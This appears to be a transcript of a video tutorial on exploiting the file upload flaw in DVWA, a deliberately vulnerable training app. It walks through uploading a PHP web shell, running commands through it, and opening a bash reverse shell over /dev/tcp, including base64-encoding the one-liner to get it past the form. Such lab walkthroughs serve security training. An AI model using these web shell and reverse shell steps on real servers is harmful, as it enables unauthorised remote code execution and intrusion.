Welcome back. So today we are going to look at file upload vulnerability in DVWA. So we can see here that we can choose an image to upload. So I'll just get a JPEG. Locate is not there. I can probably copy it from user, share, backgrounds, and maybe htv.jpg. And we can see what happens. So we can see we are in wrong place. Let's go to downloads. Not downloads, www. Okay, htv.jpg and upload, and it says your image was not uploaded. -HS. It's a very large size, so let's try to convert this. We will convert this to, let's say, 10%, and we'll name the file as htv.jpg again. pu-hs htv.jpg. Now it is 4K. Hopefully this should upload. Let's see. Yeah, now we are able to upload it and it gives us a path. So let's copy this path, go to a new tab and copy this path that they have given here, and just remove this hash and paste this path, and we can see that we are able to see the image that we uploaded. Now interestingly, this is an uploads folder. So let's see if we are able to browse this folder, and we can see that we can browse this folder and we can see the contents of this folder. So this could be useful for us. Now let's try to upload a PHP file to this and see what happens. So what we can do is we can create a simple PHP shell, which is just say start of PHP system $_request AK and then the end of PHP. Now you can use $_post or $_get here. I prefer to use $_request because then you can send both get or post parameters and it will work for both. If you just do $_get, only get parameters work. If you do $_post, it will work only for post parameters. But with $_request, it will work for both. Now we have this cell. Let's first quickly check this here, whether it works or not. So we will quickly bring up a local PHP server. Just remember this command. This is very useful for testing your PHP web cells. So PHP -S, the IP address and the port on which you want the server to come up. And then we can go here and say localhost 8080, and our file name was shell.php. So let's give that shell.php. Okay, and we can see that the page is not loading and we are getting some error. But the error is because the command cannot be empty in the system command, right? And we know that $_request AK was what we had given. So let's try with giving AK equals whatever. Let's try with ID. And we can see that we can get the output of ID. So now that this works, all we need to do is close this, come here and try to upload this shell.php. Click on upload and we see that it has been uploaded. Go back to our downloads folder. So refresh this and we can see that shell.php is here. Now we can actually close this just to avoid confusion. And we can click on shell.php. And this looks similar to what we were getting in local system, right? So let's try by giving $AK equals ID. And we can see that we are able to execute code on the remote system. Now, as I mentioned earlier in the command injection, you can basically give a reverse shell here, and we can start LVMP 9001, let's say, and we need to see our IP first. So IP is 75.152. So we can say bash minus C bash minus I close all def TCP 192.168.152/9001 and 1, and this should work. Looks like I have again made some typo. So let's go to ref shell. And give our IP here, which is 192.168.152. Port is 9001. We will copy this. Come here, change this, press enter. Still we are not getting a shell. Let's remove this bash minus C and try. No? Okay, so what we can try to do is basically we can echo and then take this shell, paste 64 and code it with no new lines, and give a echo so that we have it in one line. There is one plus here. We want to remove that, so let's try by giving it here. There is one more plus in the beginning, and I think it is just after minus I. Yeah. There is one equals at the end, that also we can remove, and we can do that by coming here, giving this. Okay, now we have a command that we can use, so we will do that. Echo, paste this, base 64, base 64 minus D, and then pipe it over to bash. And before we press enter there, we will quickly start our listener here and try this. And we got it. So we got a cell now, and then we can try to do whatever you want to. So that's all for today. Thank you.